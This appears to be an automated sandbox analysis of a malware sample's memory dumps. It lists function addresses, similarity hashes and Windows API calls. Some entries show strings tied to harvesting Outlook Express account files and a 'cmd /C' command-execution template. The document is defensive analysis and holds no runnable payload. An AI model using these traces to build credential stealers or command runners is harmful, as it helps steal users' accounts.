Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
